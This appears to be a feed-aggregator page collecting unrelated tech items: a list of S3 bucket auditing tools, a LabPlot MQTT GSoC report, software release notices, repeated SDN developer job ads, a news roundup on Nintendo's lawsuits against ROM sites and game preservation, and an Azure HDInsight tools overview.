  • Security Monkey: An open source bootstrap solution on github provided by Netflix. This implements monitoring, alerting and an auditable history of Cloud configurations across S3, IAM, Security Groups, Route 53, ELBs and SQS services.
  • Amazon Trusted Advisor: Helps perform multiple other functions apart from identifying insecure buckets.
  • Amazon S3 Inventory Tool: Provides either a CSV or ORC which further aids in auditing the replication and encryption status of objects in S3.
  • Custom S3 bucket scanning solutions: Scripts available on github can be used to scan and check specific S3 buckets. These include kromtech’s S3-Inspector and sa7mon’s S3Scanner. In addition, avineshwar’s slurp clone monitors certstream and enumerates s3 buckets from each domain.

With the business demanding speed and ease of use, we expect to see the continued evolution of applications, systems and infrastructure away from on-premises data centers secured behind highly segregated networks to cloud-based “X-as-a-Service” architectures. The solutions and guidance highlighted above will help you identify security gaps in your environment and bootstrap solutions to automate resolution, alerting and auditing, thereby helping you meet your organization's Corporate Information Security Policies and Standards.

Learn more:


          New comment on GeekList Log Plays Faster with SPLU      Cache   Translate Page   Web Page Cache   

by kataclysm

treegrass wrote:

I'm going to build an android bgg play logging app, inspired by this tool (board game geek isn't super mobile friendly, and I usually log from my phone), do you mind if I call it SPLU? If not that's fine I'll come up with something else but you already came up with such a great name I just figured why not use it


Um... the code for SPLU is open source so people know whether they can trust it. I'd be worried about closed-source code being called SPLU since people don't know what's in it and they also might get confused about the 2 different things with the same name... Maybe I could use your Android app first and help you think of a cool name for it? There's plenty of cool names where this one came from. I'd certainly be interested to try your app since SPLU is harder to use on mobile platforms.
          1. MonoGame - Why MonoGame?      Cache   Translate Page   Web Page Cache   

Originally posted on: http://blog.loethen.net/cwilliams/archive/2017/02/06/232975.aspx

Why MonoGame?

You’re thinking about getting into game development, and you’re trying to decide how to get started. There are a number of great reasons to go with MonoGame.

  • Maybe you found Unity to be confusing and even a bit overwhelming.
  • Maybe you prefer to “live in the code.”
  • Maybe you’ve used XNA in the past, and want to work with something similar.
  • Maybe you want to create a game that can run on Macs, Windows PCs, Android phones or tablets, iPhones and iPads, or even Xbox & Playstation… with minimal alterations or rewrites to your existing code base.

MonoGame offers game developers an opportunity to write their game once, and target MANY different platforms.

MonoGame is the open source “spiritual successor” to XNA, which was a great game development framework that is no longer supported by Microsoft.

There have been a number of quite successful games created in XNA and MonoGame. You can see a few here.

In the next post, I’ll cover what you will need, and where to find it. If you came directly to this page, you can find the complete list of articles here.


          Are you using cryptocurrencies? Request for info.      Cache   Translate Page   Web Page Cache   

Originally posted on: http://blog.loethen.net/cwilliams/archive/2014/03/13/155671.aspx

Hey everyone,

I'm working on an open source library involving Bitcoin and I was wondering how many (if any) of you are currently working with cryptocurrencies in your apps & games?
 
Whether you are buying/selling them, or just accepting them as a form of payment, I'd like to get some idea of what you're doing, what APIs you're hitting, what you think of it overall, and how I can (possibly?) make things like microtransactions and in-app purchases easier for you.
 
Feel free to leave a comment on this post, or message me if you don't want to talk about it publicly.
 
Thanks!
Chris

          Inviting Experts to Share Knowledge      Cache   Translate Page   Web Page Cache   
Inviting Experts to Share Knowledge

Open Source India (OSI) is the premier Open Source conference in Asia targeted at nurturing and promoting the Open Source ecosystem in the subcontinent. Started as LinuxAsia in 2004, OSI has been at the helm of bringing together the Open Source industry and the community in the last 14 years. The 15th edition of OSI […]

The post Inviting Experts to Share Knowledge appeared first on Open Source For You.


          A Quick Dive into Kata Containers 1.0      Cache   Translate Page   Web Page Cache   
A Quick Dive into Kata Containers 1.0

Kata Containers is a free and open source project aimed at building standard lightweight virtual machines (VMs). These VMs have the feel of containers and work like them, but have the security isolation of VMs. Kata Containers has community support but is looking for more contributors with varied expertise and skills. During the latest OpenStack […]

The post A Quick Dive into Kata Containers 1.0 appeared first on Open Source For You.


          LabPlot's MQTT in the finish line      Cache   Translate Page   Web Page Cache   
Hello everyone. GSoC is coming to its end, so I think that I should give a report about what's been done since the last post, and also make a brief evaluation, summary of the project itself. 

As I've written in my last post, the main focus was on improving the quality of the code, cleaning, optimizing and properly documenting it. And also making it more comestible for other developers. 

The next step was searching for bugs and then fixing them. In order to do this properly, I implemented a unit test for the main MQTT related features. This proved to be useful since it helped discover several hidden bugs and errors which were all corrected. The main features, that tests were developed for, are: checking if a topic contains another one, checking if two topics are "common topics" (meaning they only differ at only one level, and are the same size), managing messages, subscribing&unsubscribing.

As I said in the previous post, a problem was that LabPlot couldn't plot QDateTime, so using an index column was necessary. However, fortunately Alexander Semke, as he promised, dealt with the matter, so plotting of data from a single topic is now possible without needing any plus/additional data. I'm truly thankful to Alexander for this.

The main improvements were related to algorithms needed for subscribing and unsubscribing. This process is now more optimal, and I really hope that is bug-free, since a lot of time was spent on testing every possible scenario for this feature. Not only the algorithms were improved regarding this feature, but the user interface as well. Now we use two tree widgets, which really does look better than the previous list widget (used for listing subscriptions). Using the tree widget for listing subscriptions made room for further improvements. Now not only the subscription is listed, but if the subscription contains wildcards, then every topic contained by the subscription and present in the topic tree will be added as children of the subscription, in order to make the user's life easier. Searching for root subscriptions in the tree widget is possible just like in the case of the topic tree widget.
 
New UI for subscribing&unsubscribing

Another improvement is dealing properly with multiple MQTTClient objects, which wasn't quite alright at the time of the last post. Now it works fine, and the user can easily control each of the MQTTClients using the LiveDataDock. Another bug/absurdity was fixed. Namely, the user could add more MQTTClients with the same hostname, which is quite illogical (since the user can control every topic of a broker with a single MQTTClient). Another minor visual improvement is that an icon for MQTTClient and MQTTSubscripiton was added.
 
Dealing with multiple MQTTClients


As I presented the major improvements, I think it's high time I showed you a possible and practical use of the features developed and the benefits of LabPlot having MQTT support. MQTT, as I mentioned in earlier posts, is mainly used to communicate data collected by sensors. So if one had the possibility and adequate sensors, then one can save&plot data collected by those sensors. However, there are less sophisticated uses as well. As we all know our phones have quite a few sensors, which could be put to use. And there is an application for this, which can be used by everyone who owns a smartphone: Sensor Node Free. In the app the user can choose from multiple sensors, the data of which can be sent to a preferred MQTT broker using a preferred topic name. As you can see in the next picture.
Choosing the sensors, setting the broker and the topic name in the app

Of course, any app, that has these features, could be used (for example a fitness app), but my mentor suggested this one.  The data of these sensors will be ploted in the demo video. Almost every sensor sends data divided to x, y, z axis. These 3 will be shown in the same plot, their data set as Y value, and the QDateTime allocated to the values as X value. the curves based on data from x axis will be red, the y axis green, and the z axis purple. The plotting was done for a while before starting to record the video. So here is the demo video:

Demo video


And finally here comes the evaluation/summary. I truly think that every feature presented in my proposal is implemented and working. So I think the main aim is met: LabPlot now has full support for MQTT. There were difficulties along the way, but with work, and help from my mentor, everything was dealt with. As I said everything works, but some unforeseen bugs or errors might appear in the future. Some steps for the future may be to improve the overall performance of the new features.

Working on this project for the last 3 months has been a very great experience, and I can honestly say that I improved my coding skills and way of thinking in a way I haven't even dreamt for. I'm more than grateful to my mentor, Kristóf, who always helped me and had my back if I encountered any hardship. I'd also like to express my gratitude towards Alexander Semke, my mentor's former mentor and an invaluable member of the LabPlot team, who also helped me a great deal. I am determined to further improve the features, even after GSoC ended. I would be more than happy to stay in this amazing team and help them whenever they need me. It's my goal for next summer to join GSoC  again and work on LabPlot with Kristof, since I really liked being part of this team. I truly think that people should contribute more to the open source community, and the end of GSoC shouldn't mean the end of the involvement as well.

This is it, guys. Thank you for reading the post, and thank you for your interest in my project. If there's any development regarding my project or a new task (in the future) I'll let you know here. Bye :)

          WhiteSource unveils free open source Vulnerability Checker      Cache   Translate Page   Web Page Cache   

WhiteSource announced the release of its Vulnerability Checker, a free tool that provides companies with immediate, real-time alerts on the 50 most critical open source vulnerabilities published in the open source community. The new standalone CLI tool is free to use and available for anyone to download as a desktop application directly from the WhiteSource website. Once downloaded, the Vulnerability Checker offers users the opportunity to import and scan any library and run a quick … More

The post WhiteSource unveils free open source Vulnerability Checker appeared first on Help Net Security.


          TBS Source One Frame      Cache   Translate Page   Web Page Cache   

TBS Source One frame. Since the files were open source I figured why not.
Print 2 camera mounts and 4 arms. Pick between M3 holes or press nut holes on the arm plate.

https://youtu.be/8qjpnIgd-O4
https://youtu.be/oWpCZgJzntc


          HijackThis Fork Portable 2.8.0.4 (browser hijack scanner) Released      Cache   Translate Page   Web Page Cache   

logoHijackThis Portable 2.8.0.4 has been released. HijackThis Fork is a settings scanner that can find common settings changes made by malware and other software. Advanced users can use it to find and reset settings that have changed. Like most system tools, this app requires admin rights. It's packaged in PortableApps.com Format so it can easily integrate with the PortableApps.com Platform. And it's open source and completely free.

Update automatically or install from the portable app store in the PortableApps.com Platform.


          Google Chrome Portable 68.0.3440.106 Stable (web browser) Released      Cache   Translate Page   Web Page Cache   

Google Chrome Portable 68.0.3440.106 Stable has been released. Google Chrome Portable is a web browser that runs web pages and applications quickly. The latest Beta and Dev builds are also available. It's packaged as a portable app, so you can take your browsing experience with you and it's in PortableApps.com Format so it can easily integrate with the PortableApps.com Platform. It's partially open source freeware for personal and business use.

Update automatically or install from the portable app store in the PortableApps.com Platform.


          Mozilla Firefox, Portable Edition 61.0.2 (web browser) Released      Cache   Translate Page   Web Page Cache   

PortableApps.com is proud to announce the release of Mozilla Firefox®, Portable Edition 61.0.2. It's the Mozilla Firefox browser bundled with a PortableApps.com launcher as a portable app, so you can take your browser, bookmarks, settings and extensions on the go. And it's open source and completely free. Firefox Portable is a dual-mode 32-bit and 64-bit app, ensuring Firefox runs as fast as possible on every PC.

Mozilla®, Firefox® and the Firefox logo are registered trademarks of the Mozilla Foundation and used under license.

Update automatically or install from the portable app store in the PortableApps.com Platform.


          Telecommute All Source Analyst      Cache   Translate Page   Web Page Cache   
A provider of performance solutions is seeking a Telecommute All Source Analyst. Must be able to: Perform structured analysis on events of national intelligence interest Manipulate various classified and open source databases Experience authoring and developing reports, particularly finished products/reports Skills and Requirements Include: Experience authoring and developing reports, particularly finished products/reports Familiarity with key US foreign policy and national security counterterrorism objectives Excellent communication skills Requires TS/SCI clearance with polygraph
          Prometheus monitoring tool joins Kubernetes as CNCF’s latest ‘graduated’ project      Cache   Translate Page   Web Page Cache   
The Cloud Native Computing Foundation (CNCF) may not be a household name, but it houses some important open source projects including Kubernetes, the fast-growing container orchestration tool. Today, CNCF announced that the Prometheus monitoring and alerting tool had joined Kubernetes as the second “graduated” project in the organization’s history. The announcement was made at PromCon, the […]
          Xori Adds Speed, Breadth to Disassembler Lineup      Cache   Translate Page   Web Page Cache   
A new open source tool, introduced at Black Hat USA, places a priority on speed and automation.
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI      Cache   Translate Page   Web Page Cache   
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          The Linux Foundation Announces Keynote Speakers for All New Open FinTech Forum to Explore the Intersection of Financial Services and Open Source      Cache   Translate Page   Web Page Cache   
...events to scale any open source project, which together deliver an economic impact not achievable by any one company. More information can be found at www.linuxfoundation.org . The Linux Foundation has registered trademarks and uses trademarks. For a list of ...

          (USA-CA-Lake Forest) Sr. Systems Engineer      Cache   Translate Page   Web Page Cache   
**Sr.** Systems Engineer in Lake Forest, CA at Volt # Date Posted: _8/9/2018_ # Job Snapshot + **Employee Type:** Contingent + **Location:** 25892 Towne Centre Drive North Lake Forest, CA + **Job Type:** Computer Industry + **Duration:** 0 weeks + **Date Posted:** 8/9/2018 + **Job ID:** 131202 + **Pay Rate** $80000.0 - $100000.0/Year + **Contact Name** Volt Branch + **Phone** 760/710-3674 # Job Description This position requires senior skills in server technologies with extensive practical experience planning, implementing, verifying and troubleshooting local on-prem and cloud platform including Azure, VMware, Cisco and more. The candidate for this role should have at a minimum the following qualifications: + 3-5 years of experience managing Azure cloud technologies and current Microsoft certification + 7-10 years of experience as a Microsoft Systems Engineer preferably with an MCSE certification + Experience with VMWare + Experience with the implementation and/or operations of medium to large-scale enterprise cloud infrastructure supporting a software development team + Knowledge of cloud networking architecture, cloud operations, security, automation and orchestration + Experience with High Availability/Site Recovery design principles + Advanced Knowledge of MS Server, Active Directory, Exchange, Microsoft SQL, Office 365 support and migration + Well-rounded knowledge of storage solutions such as Dell Equallogic, Nimble, Compellent, ISCSI, Fiber-Channel, etc… + Supporting servers such as Dell PowerEdge or HP ProLiant + Well versed in Data Backup and Recovery tools + Comfortable managing Antivirus or similar Enterprise Software tools + Deep understanding of TCP/IP networks and related technologies + Experience implementing and managing network/system monitoring tools + Experience supporting and managing Cisco (WiFi) networks + Ability to independently troubleshoot Cisco routers, Cisco switches, ASA Firewalls, Cisco Wireless equipment at a CCNA level + Available for afterhours support and on-call rotation as needed Scoping, architecting and implementing new LAN/WAN and Cloud (MS/Azure) environments + Diagnosing, troubleshooting and correcting issues with Cisco, LAN/Wireless hardware (Meraki), and Azure PaaS/IaaS workloads + Capturing and analyzing packet traces; assessing OS issues; implements Azure service changes + Participates in developing and generating conceptual, logical and physical network architecture/designs including drawings and device configurations + Participates in implementing enterprise and Cloud based security mechanisms and policies + Some scripting and automation (Python, bash, Linux, open source tools). + Serves as a tier 2 escalation resource for resolution of enterprise issues + Installing and configuring Cisco switching: Workgroup, Campus and Data Center products + Installing and configuring Wi-Fi and working with vendors on Wi-Fi related issues + Installing, configuring Cisco switches/Routers (VSS, OSPF, BGP) + Working closely with Telco providers and Clients on WAN upgrades/implementations + Working closely with DevOPs an DBA on architectural changes to cloud PaaS/IaaS environments + Working closely with colleagues to meet team goals and improve process and practices + Serves as a tier 3 escalation resource for resolution of complex enterprise issues To learn more about Volt, please visit http://www.volt.com and to see more of our job postings, please visit: http://jobs.volt.com Please call 760-7 _10_ -3674 or email ndost@volt.com for any questions. **Volt is an Equal Opportunity Employer** In order to promote this harmony in the workplace and to obey the laws related to employment, Volt maintains a strong commitment to equal employment opportunity without unlawful regard to race, color, national origin, citizenship status, ancestry, religion (including religious dress and grooming practices), creed, sex (including pregnancy, childbirth, breastfeeding and related medical conditions), sexual orientation, gender identity, gender expression, marital or parental status, age, mental or physical disability, medical condition, genetic information, military or veteran status or any other category protected by applicable law.
          (USA-MD-Columbia) Software Engineer/Developer      Cache   Translate Page   Web Page Cache   
This position is for a senior software developer to design and implement SDN (Software Defined Networking) and NFV (Network Function Virtualization) components and interfaces for AT&T Global Public Sector customers in order to intelligently scale network services and enable rapid deployment of advanced cutting-edge features and services, and provide industry leading security, performance and reliability. The network services will be built on the Open Network Automation Platform (ONAP), an open source initiative based on the AT&T ECOMP (Enhanced Control, Orchestration, Management & Policy) project as well as the Open-O (Open Orchestrator) project to bring the capabilities for designing, creating, orchestrating and handling of the full lifecycle management of Virtual Network Functions, Software Defined Networks, and the services that all of these pieces enable. As a developer on an agile Scrum team, you will contribute to technical analysis of AT&T Global Public Sector customer network initiatives, specify detailed requirements and design for the impacted ONAP components, including (a) real time inventory of virtual network resources, (b) orchestration, control and activation of virtual network functions and services, (c) application control and policy management for closed loop control, and (d) network data collection and analytics, implement, and deploy these services onto the customer network. **Required Skills, Certification, Experience, and Education** + 5+ years of software development experience + Proficiency with one or more programming languages such as Python, Java, Javascript, C/C++ Experience developing and interfacing with RESTful APIs + Ability to work in a Linux environment including shell scripting. + Knowledge of basic networking principles such as the IP protocol suite (e.g. TCP, UDP, ICMP, etc.) + Exposure to OpenStack, Docker, Kubernetes and containers + Exposure to virtualization, SDN, Cloud technologies such as TOSCA, YANG, NETCONF, OpenStack, VMware, OpenDaylight + Bachelor’s degree or higher in Computer Science or related technical disciplines **Required Clearance:** Must be a US Citizen and possess Secret Clearance **Desired:** + Experience with NFV and experience in production/operationalization of VNF’s/onboarding on NFVi (Network Function Virtualization infrastructure) platforms. + Exposure to ONAP or AT&T ECOMP platforms with basic understanding of the major components including: Multi-VIM/Cloud, SDN Controller, Application Controller, Virtual Function Controller, A&AI, DCAE/Correlation engine, Service Orchestration, and the ability to apply “policy” across these components in the delivery of a service + Experience working with vCPE (virtual CPE) solutions (e.g. AT&T Flexware) for managed services and software-defined WAN + Some exposure to a commercial network automation platform such as Ciena Blue Planet or Cisco NSO (Network Services Orchestrator) + Experience with automation technologies such as Ansible, Puppet, Chef, Jenkins. + Experience working with open source communities and software AT&T is an Affirmative Action/Equal Opportunity Employer and we are committed to hiring a diverse and talented workforce. EOE/AA/M/F/D/V
          (USA-DC-Washington) Software Engineer/Developer      Cache   Translate Page   Web Page Cache   
This position is for a senior software developer to design and implement SDN (Software Defined Networking) and NFV (Network Function Virtualization) components and interfaces for AT&T Global Public Sector customers in order to intelligently scale network services and enable rapid deployment of advanced cutting-edge features and services, and provide industry leading security, performance and reliability. The network services will be built on the Open Network Automation Platform (ONAP), an open source initiative based on the AT&T ECOMP (Enhanced Control, Orchestration, Management & Policy) project as well as the Open-O (Open Orchestrator) project to bring the capabilities for designing, creating, orchestrating and handling of the full lifecycle management of Virtual Network Functions, Software Defined Networks, and the services that all of these pieces enable. As a developer on an agile Scrum team, you will contribute to technical analysis of AT&T Global Public Sector customer network initiatives, specify detailed requirements and design for the impacted ONAP components, including (a) real time inventory of virtual network resources, (b) orchestration, control and activation of virtual network functions and services, (c) application control and policy management for closed loop control, and (d) network data collection and analytics, implement, and deploy these services onto the customer network. **Required Skills, Certification, Experience, and Education** + 5+ years of software development experience + Proficiency with one or more programming languages such as Python, Java, Javascript, C/C++ Experience developing and interfacing with RESTful APIs + Ability to work in a Linux environment including shell scripting. + Knowledge of basic networking principles such as the IP protocol suite (e.g. TCP, UDP, ICMP, etc.) + Exposure to OpenStack, Docker, Kubernetes and containers + Exposure to virtualization, SDN, Cloud technologies such as TOSCA, YANG, NETCONF, OpenStack, VMware, OpenDaylight + Bachelor’s degree or higher in Computer Science or related technical disciplines **Required Clearance:** Must be a US Citizen and possess Secret Clearance **Desired:** + Experience with NFV and experience in production/operationalization of VNF’s/onboarding on NFVi (Network Function Virtualization infrastructure) platforms. + Exposure to ONAP or AT&T ECOMP platforms with basic understanding of the major components including: Multi-VIM/Cloud, SDN Controller, Application Controller, Virtual Function Controller, A&AI, DCAE/Correlation engine, Service Orchestration, and the ability to apply “policy” across these components in the delivery of a service + Experience working with vCPE (virtual CPE) solutions (e.g. AT&T Flexware) for managed services and software-defined WAN + Some exposure to a commercial network automation platform such as Ciena Blue Planet or Cisco NSO (Network Services Orchestrator) + Experience with automation technologies such as Ansible, Puppet, Chef, Jenkins. + Experience working with open source communities and software AT&T is an Affirmative Action/Equal Opportunity Employer and we are committed to hiring a diverse and talented workforce. EOE/AA/M/F/D/V
          (USA-VA-Vienna) Software Engineer/Developer      Cache   Translate Page   Web Page Cache   
This position is for a senior software developer to design and implement SDN (Software Defined Networking) and NFV (Network Function Virtualization) components and interfaces for AT&T Global Public Sector customers in order to intelligently scale network services and enable rapid deployment of advanced cutting-edge features and services, and provide industry leading security, performance and reliability. The network services will be built on the Open Network Automation Platform (ONAP), an open source initiative based on the AT&T ECOMP (Enhanced Control, Orchestration, Management & Policy) project as well as the Open-O (Open Orchestrator) project to bring the capabilities for designing, creating, orchestrating and handling of the full lifecycle management of Virtual Network Functions, Software Defined Networks, and the services that all of these pieces enable. As a developer on an agile Scrum team, you will contribute to technical analysis of AT&T Global Public Sector customer network initiatives, specify detailed requirements and design for the impacted ONAP components, including (a) real time inventory of virtual network resources, (b) orchestration, control and activation of virtual network functions and services, (c) application control and policy management for closed loop control, and (d) network data collection and analytics, implement, and deploy these services onto the customer network. **Required Skills, Certification, Experience, and Education** + 5+ years of software development experience + Proficiency with one or more programming languages such as Python, Java, Javascript, C/C++ Experience developing and interfacing with RESTful APIs + Ability to work in a Linux environment including shell scripting. + Knowledge of basic networking principles such as the IP protocol suite (e.g. TCP, UDP, ICMP, etc.) + Exposure to OpenStack, Docker, Kubernetes and containers + Exposure to virtualization, SDN, Cloud technologies such as TOSCA, YANG, NETCONF, OpenStack, VMware, OpenDaylight + Bachelor’s degree or higher in Computer Science or related technical disciplines **Required Clearance:** Must be a US Citizen and possess Secret Clearance **Desired:** + Experience with NFV and experience in production/operationalization of VNF’s/onboarding on NFVi (Network Function Virtualization infrastructure) platforms. + Exposure to ONAP or AT&T ECOMP platforms with basic understanding of the major components including: Multi-VIM/Cloud, SDN Controller, Application Controller, Virtual Function Controller, A&AI, DCAE/Correlation engine, Service Orchestration, and the ability to apply “policy” across these components in the delivery of a service + Experience working with vCPE (virtual CPE) solutions (e.g. AT&T Flexware) for managed services and software-defined WAN + Some exposure to a commercial network automation platform such as Ciena Blue Planet or Cisco NSO (Network Services Orchestrator) + Experience with automation technologies such as Ansible, Puppet, Chef, Jenkins. + Experience working with open source communities and software AT&T is an Affirmative Action/Equal Opportunity Employer and we are committed to hiring a diverse and talented workforce. EOE/AA/M/F/D/V
          (USA-NJ-Middletown) Software Engineer/Developer      Cache   Translate Page   Web Page Cache   
This position is for a senior software developer to design and implement SDN (Software Defined Networking) and NFV (Network Function Virtualization) components and interfaces for AT&T Global Public Sector customers in order to intelligently scale network services and enable rapid deployment of advanced cutting-edge features and services, and provide industry leading security, performance and reliability. The network services will be built on the Open Network Automation Platform (ONAP), an open source initiative based on the AT&T ECOMP (Enhanced Control, Orchestration, Management & Policy) project as well as the Open-O (Open Orchestrator) project to bring the capabilities for designing, creating, orchestrating and handling of the full lifecycle management of Virtual Network Functions, Software Defined Networks, and the services that all of these pieces enable. As a developer on an agile Scrum team, you will contribute to technical analysis of AT&T Global Public Sector customer network initiatives, specify detailed requirements and design for the impacted ONAP components, including (a) real time inventory of virtual network resources, (b) orchestration, control and activation of virtual network functions and services, (c) application control and policy management for closed loop control, and (d) network data collection and analytics, implement, and deploy these services onto the customer network. **Required Skills, Certification, Experience, and Education** + 5+ years of software development experience + Proficiency with one or more programming languages such as Python, Java, Javascript, C/C++ Experience developing and interfacing with RESTful APIs + Ability to work in a Linux environment including shell scripting. + Knowledge of basic networking principles such as the IP protocol suite (e.g. TCP, UDP, ICMP, etc.) + Exposure to OpenStack, Docker, Kubernetes and containers + Exposure to virtualization, SDN, Cloud technologies such as TOSCA, YANG, NETCONF, OpenStack, VMware, OpenDaylight + Bachelor’s degree or higher in Computer Science or related technical disciplines **Required Clearance:** Must be a US Citizen and possess Secret Clearance **Desired:** + Experience with NFV and experience in production/operationalization of VNF’s/onboarding on NFVi (Network Function Virtualization infrastructure) platforms. + Exposure to ONAP or AT&T ECOMP platforms with basic understanding of the major components including: Multi-VIM/Cloud, SDN Controller, Application Controller, Virtual Function Controller, A&AI, DCAE/Correlation engine, Service Orchestration, and the ability to apply “policy” across these components in the delivery of a service + Experience working with vCPE (virtual CPE) solutions (e.g. AT&T Flexware) for managed services and software-defined WAN + Some exposure to a commercial network automation platform such as Ciena Blue Planet or Cisco NSO (Network Services Orchestrator) + Experience with automation technologies such as Ansible, Puppet, Chef, Jenkins. + Experience working with open source communities and software AT&T is an Affirmative Action/Equal Opportunity Employer and we are committed to hiring a diverse and talented workforce. EOE/AA/M/F/D/V
          LXer: How to install Fork CMS on Ubuntu 18.04 LTS      Cache   Translate Page   Web Page Cache   
Published at LXer: Fork CMS is a free and open source content management CMS that comes with an intuitive and user-friendly web interface. In this tutorial, we will explain how to install Fork CMS...
          "You wouldn't download a car!"      Cache   Translate Page   Web Page Cache   
What Does Nintendo's Shutdown Of ROM-Sharing Sites Mean For Video Game Preservation? [Nintendo Life] "The recent news that Nintendo is taking legal action against two sites which illegally distributed ROMs has been met with an overwhelmingly positive response, and rightly so. The individuals sharing these files online care little for the intellectual property rights of the developers who slave away to make the games we get hours of enjoyment out of, and instead leverage the growing interest in retro gaming purely to plaster their sites with garish advertisements for mail-order girlfriends and other dubious businesses. Nintendo – a company traditionally very protective of its IP – has struck a blow which will hopefully have long-term ramifications for the entire industry."

• Nintendo Suing Pirate Websites For Millions [Kotaku]
"On July 19, Nintendo filed suit in an Arizona Federal Court against the operator of two popular retro gaming sites, which had been hosting ROMS of some of the company's most famous games. The suit alleges that the two sites, LoveROMS.com and LoveRETRO.co—both owned and operated by Jacob Mathias—are "built almost entirely on the brazen and mass-scale infringement of Nintendo's intellectual property rights." "In addition to Nintendo's video games", the suit says, "Defendants reproduce, distribute, and publicly perform a vast library of Nintendo's other copyrighted works on and through the LoveROMs and LoveRETRO websites, including the proprietary BIOS software for several of Nintendo's video game systems and thousands of Nintendo's copyrighted musical works and audio recordings.""
• Lawsuit threat shuts down ROM downloads on major emulation site [Ars Technica]
"In the wake of Nintendo's recent lawsuits against other ROM distribution sites, major ROM repository EmuParadise has announced it will preemptively cease providing downloadable versions of copyrighted classic games. While EmuParadise doesn't seem to have been hit with any lawsuits yet, site founder MasJ writes in an announcement post that "it's not worth it for us to risk potentially disastrous consequences. I cannot in good conscience risk the futures of our team members who have contributed to the site through the years. We run EmuParadise for the love of retro games and for you to be able to revisit those good times. Unfortunately, it's not possible right now to do so in a way that makes everyone happy and keeps us out of trouble." EmuParadise will continue to operate as a repository for legal downloads of classic console emulators, as well as a database of information on thousands of classic games. "But you won't be able to get your games from here for now," as MasJ writes."
• Emulation isn't a dirty word, and one man thinks it can save gaming's history [Polygon]
""According to the Film Foundation, over half the films made before 1950 are gone," Cifaldi said. "I don't mean that you can't buy these on DVD. I mean they're gone. They don't exist anymore." For films produced before 1920, Cifaldi said, that number jumps to 80 percent. "That terrified me. I wasn't particularly a film buff, but the idea of these works just disappearing forever and never being recoverable scared the crap out of me. So I started wondering is anyone doing this for games. Is anyone making sure that video games aren't doing the same stupid shit that film did to make their heritage disappear? "And yeah, there were people doing this. We didn't call them archivists. We didn't call them digital archeologists or anything. We called them software pirates." It's emulation's long association with piracy, Cifaldi said, that has given it a bad name. Nintendo in particular seems to have a particular aversion towards it, he noted, pointing to their official statement on the issue which has been available at their corporate website for the last 16 years."
• Nintendo vs. Emulation: The difficulty of archiving games [Nintendo Enthusiast]
"Creating and using ROMs/ISOs and emulators is not inherently illegal. The thing is, there's a very thin gray area between the border of legal and illegal in this case. For someone to play classic games completely legally without it being on the original hardware with the original software, they would need to be using an emulator that's running on custom code and doesn't use BIOS files obtained from an external source. As for the games, they would need to be backups created by the user, who would have to create them by dumping the data from their own original copies of said games. Thus, emulation becomes illegal as soon as file-sharing is involved, and the vast majority of folks using emulators is doing so thanks to file-sharing. This is why Nintendo has constantly been trying to take down emulation hubs as it considers them to be centers for piracy promotion."
• Yes, Downloading Nintendo ROMs Is Illegal (Even if You Own the Game) [Tom's Hardware]
"For the most part, emulators in and of themselves do not fall under any copyright infringement, depending on their purpose. And, as mentioned before, it's unlikely a firm will call copyright infringement on a game if no company own the rights to it, or if no one really cares about the game. But what about the games people and companies do care about? It turns out, you're welcome to emulate any game for backup, so long as it's not used for commercial use. Check out what the U.S. Copyright Office has to say about it:
"Under section 117, you or someone you authorize may make a copy of an original computer program if the new copy is being made for archival (i.e., backup) purposes only; you are the legal owner of the copy; and any copy made for archival purposes is either destroyed, or transferred with the original copy, once the original copy is sold, given away, or otherwise transferred."
But selling that backup copy is another story, according to the U.S. Copyright Office:
"If you lawfully own a computer program, you may sell or transfer that lawful copy together with a lawfully made backup copy of the software, but you may not sell the backup copy alone. ... In addition to being a violation of the exclusive right of distribution, such activity is also likely to be a violation of the terms of the license to the software. ... You should be wary of sites that offer to sell you a backup copy. And if you do buy an illegal backup copy, you will be engaging in copyright infringement if you load that illegal copy onto your computer ...""
• The retro gaming industry could be killing video game preservation [Eurogamer]
"The convoluted nature of the video game emulation sector means that emulators rarely stand still for long; like any other program they are iterated upon, improved, modified for different tasks and generally tinkered with endlessly, creating development forks which branch off in multiple directions. It transpired that the fork of Snes9x used in the Retron 5 could be directly attributed to De Matteis himself. "Snes9x Next/2010 was a speedhack-focused fork that I personally developed, open sourced and published on Github," he says. "I had to perform heavy alterations to this core to get it to run acceptably well on old hardware. It is likely they used the software for this exact reason; that the others were not up to par performance-wise and it offered a good balance between performance and compatibility. Needless to say, I was never consulted beforehand; software was simply taken and sold in spite of its license that expressly forbids this." In Hyperkin's defense, it's not like the company simply downloaded the code from the web and installed it on the Retron 5; like many firms of this type, it didn't develop the software in-house but instead purchased it from an external contractor. De Matteis knows who this individual is - and has informed Hyperkin that he is aware of their identity - but doesn't wish to name them here. Nonetheless, this contractor has profited off the hard work of the RetroArch team."

          Azure HDInsight Interactive Query: Ten tools to analyze big data faster      Cache   Translate Page   Web Page Cache   

Customers use HDInsight Interactive Query (also called Hive LLAP, or Low Latency Analytical Processing) to query data stored in Azure storage & Azure Data Lake Storage in super-fast manner. Interactive query makes it easy for developers and data scientist to work with the big data using BI tools they love the most. HDInsight Interactive Query supports several tools to access big data in easy fashion. In this blog we have listed most popular tools used by our customers:

Microsoft Power BI

Microsoft Power BI Desktop has a native connector to perform direct query against HDInsight Interactive Query cluster. You can explore and visualize the data in interactive manner. To learn more see Visualize Interactive Query Hive data with Power BI in Azure HDInsight and Visualize big data with Power BI in Azure HDInsight .


Azure HDInsight Interactive Query: Ten tools to analyze big data faster
Apache Zeppelin

Apache Zeppelin interpreter concept allows any language/data-processing-backend to be plugged into Zeppelin. You can access Interactive Query from Apache Zeppelin using a JDBC interpreter. To learn more please see Use Zeppelin to run Hive queries in Azure HDInsight .


Azure HDInsight Interactive Query: Ten tools to analyze big data faster
Visual Studio Code

With HDInsight Tools for VS Code, you can submit interactive queries as well at look at job information in HDInsight interactive query clusters. To learn more please see Use Visual Studio Code for Hive, LLAP or pySpark .


Azure HDInsight Interactive Query: Ten tools to analyze big data faster
Visual Studio

Visual Studio integration helps you create and query tables in visual fashion. You can create a Hive tables on top of data stored in Azure Data Lake Storage or Azure Storage. To learn more please see Connect to Azure HDInsight and run Hive queries using Data Lake Tools for Visual Studio .


Azure HDInsight Interactive Query: Ten tools to analyze big data faster
Ambari Hive View

Hive View is designed to help you author, optimize, and execute queries. With Hive Views you can:

